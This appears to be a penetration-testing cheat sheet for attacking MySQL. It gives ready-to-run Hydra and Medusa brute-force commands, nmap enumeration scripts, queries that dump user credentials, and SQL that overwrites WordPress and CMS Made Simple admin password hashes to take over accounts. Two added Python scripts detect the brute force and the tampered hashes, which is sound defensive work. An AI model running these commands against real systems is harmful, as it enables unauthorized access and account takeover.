MySQL (port 3306)
1. Nmap MySQL Scanning:
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.10
2. Brute-forcing MySQL Credentials:
Hydra (for password brute-forcing):
sudo hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.101.178 mysql
Medusa (alternative to Hydra):
medusa -h 10.10.10.10 -u bob -P rockyou.txt -M mysql
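On the defensive side, the Hydra and Medusa runs above leave a dense trail of "Access denied for user" notes in the MySQL error log. The following script is an added example (not from this page or any tool it mentions) that parses such lines and flags a source host/user pair once it exceeds a failure threshold inside a sliding time window. The log lines are constructed in the style of the MySQL 8 error log; the message id, hosts and timestamps are invented sample data, and the regex only relies on the "Access denied for user 'u'@'h'" text.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample written in the style of the MySQL 8 error log (not from the
# page). MySQL only writes these [Note]-level "Access denied" messages to the
# error log when log_error_verbosity=3, so enable that before relying on them.
SAMPLE_ERROR_LOG = """\
2024-05-01T10:00:00.000000Z 11 [Note] [MY-010926] [Server] Access denied for user 'root'@'192.168.101.178' (using password: YES)
2024-05-01T10:00:03.000000Z 12 [Note] [MY-010926] [Server] Access denied for user 'root'@'192.168.101.178' (using password: YES)
2024-05-01T10:00:06.000000Z 13 [Note] [MY-010926] [Server] Access denied for user 'root'@'192.168.101.178' (using password: YES)
2024-05-01T10:00:09.000000Z 14 [Note] [MY-010926] [Server] Access denied for user 'root'@'192.168.101.178' (using password: YES)
2024-05-01T10:00:12.000000Z 15 [Note] [MY-010926] [Server] Access denied for user 'root'@'192.168.101.178' (using password: YES)
2024-05-01T10:00:15.000000Z 16 [Note] [MY-010926] [Server] Access denied for user 'root'@'192.168.101.178' (using password: YES)
2024-05-01T10:05:00.000000Z 17 [Note] [MY-010926] [Server] Access denied for user 'bob'@'10.0.0.7' (using password: YES)
2024-05-01T10:05:30.000000Z 18 [System] [MY-010931] [Server] /usr/sbin/mysqld: ready for connections.
"""

# Timestamp, connection id, severity bracket, then the access-denied text.
DENIED_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+\[\w+\].*Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'"
)


def parse_denied(log_text):
    """Return (timestamp, user, host) tuples for every 'Access denied' line."""
    events = []
    for line in log_text.splitlines():
        m = DENIED_RE.search(line)
        if not m:
            continue
        # Strip the trailing 'Z' so the parse works on Python versions < 3.11.
        ts = datetime.strptime(m.group("ts").rstrip("Z"), "%Y-%m-%dT%H:%M:%S.%f")
        events.append((ts, m.group("user"), m.group("host")))
    return events


def find_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Flag (host, user) pairs with >= threshold failures inside any window.

    Returns a dict {(host, user): peak_failures_in_window} for flagged pairs.
    """
    by_source = defaultdict(list)
    for ts, user, host in parse_denied(log_text):
        by_source[(host, user)].append(ts)

    flagged = {}
    for key, times in by_source.items():
        times.sort()
        start = 0
        peak = 0
        # Two-pointer sliding window over the sorted failure timestamps.
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[key] = peak
    return flagged


if __name__ == "__main__":
    for (host, user), n in find_bruteforce(SAMPLE_ERROR_LOG).items():
        print(f"possible brute force: {n} failures for '{user}' from {host}")
```

The single failure from 10.0.0.7 stays below the threshold, while the six failures for root from 192.168.101.178 inside fifteen seconds are reported; in production this is the signal to pair with a bind-address restriction and a host-limited root account so the brute force has nothing to hit.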
3. Internal MySQL Database Enumeration:
Once you gain access to a MySQL database, you can run the following commands to enumerate users and databases:
List Databases:
show databases;
Select a Database (example: textpattern):
use textpattern;
List Tables in the Database:
show tables;
Enumerate Users (the table name depends on the application's schema):
select * from users;
List Specific User Information (e.g., username, email, password):
select username,email,password from users;
4. MySQL to System Root:
Refer to the following guide for methods of privilege escalation from MySQL to system root on Linux: Recipe for Root - MySQL to System Root
5. Resetting a MySQL Admin Password:
If you have access to the database and can see the hash of the password for the admin user, you can update the password hash as follows:
Example for WordPress:
Generate an MD5 hash of the new password (redcliff in this case):
echo -n "redcliff" | md5sum
Update the password in the MySQL database (assuming you are using MariaDB/MySQL). WordPress accepts a plain MD5 in user_pass only for legacy compatibility and rehashes it on the next login:
update wp_users set user_pass = '8d70e0d1acb06b4648c7aa8927509660' where ID = 1;
Example for CMS Made Simple 2.2.13:
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'redcliff'))) where username = 'admin';
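Because WordPress normally stores phpass ("$P$") or bcrypt hashes, a bare 32-character MD5 appearing in wp_users.user_pass, especially on the administrator row, is a useful indicator that the direct-UPDATE reset described above has happened. The following audit script is an added example (not from this page or from WordPress itself) that classifies each user_pass value and returns the rows that do not carry a current hash format. The rows are constructed sample data; only the MD5 value for ID 1 is the one the page writes into the database.

```python
import re

# Constructed sample of wp_users rows (ID, user_login, user_pass). Only the MD5
# on ID 1 comes from the page; the phpass and bcrypt strings are invented
# placeholders of the right length and prefix, not real hashes.
SAMPLE_ROWS = [
    (1, "admin", "8d70e0d1acb06b4648c7aa8927509660"),
    (2, "editor", "$P$BabcdefghijklmnopqrstuvwxyzABCD"),
    (3, "author", "$wp$2y$10$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0"),
    (4, "ghost", ""),
]

# Hash shapes WordPress writes or accepts:
#   phpass portable hash: "$P$" or "$H$" + 1 cost char + 8 salt + 22 hash = 34 chars
#   bcrypt (WordPress 6.8+ prefixes it with "$wp"): "$2y$NN$" + 53 chars
#   legacy plain MD5: 32 lowercase hex digits, accepted only for old installs
MD5_HEX = re.compile(r"^[0-9a-f]{32}$")
PHPASS = re.compile(r"^\$[PH]\$.{31}$")
BCRYPT = re.compile(r"^(\$wp)?\$2[aby]\$\d{2}\$.{53}$")


def classify(user_pass):
    """Name the hash format of one user_pass value."""
    if PHPASS.match(user_pass):
        return "phpass"
    if BCRYPT.match(user_pass):
        return "bcrypt"
    if MD5_HEX.match(user_pass):
        return "md5-legacy"
    return "unknown"


def audit_user_pass(rows):
    """Return (ID, user_login, format) for rows whose hash is not phpass/bcrypt.

    An 'md5-legacy' hit on a site that has been logging in normally for years
    points at a direct UPDATE of wp_users rather than a password set through
    WordPress; 'unknown' covers empty or malformed values.
    """
    findings = []
    for user_id, login, user_pass in rows:
        fmt = classify(user_pass)
        if fmt not in ("phpass", "bcrypt"):
            findings.append((user_id, login, fmt))
    return findings


if __name__ == "__main__":
    for user_id, login, fmt in audit_user_pass(SAMPLE_ROWS):
        print(f"ID {user_id} ({login}): unexpected hash format {fmt}")
```

Run this over a `select ID, user_login, user_pass from wp_users;` export on a schedule and alert on any new md5-legacy or unknown row; pairing it with binary-log review of UPDATE statements against wp_users shows when and from which connection the change was made.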
6. Connecting Remotely to MySQL:
mysql -u root -h 192.168.101.184 -p
Dedicated Sections for SQL Injection/Privilege Escalation: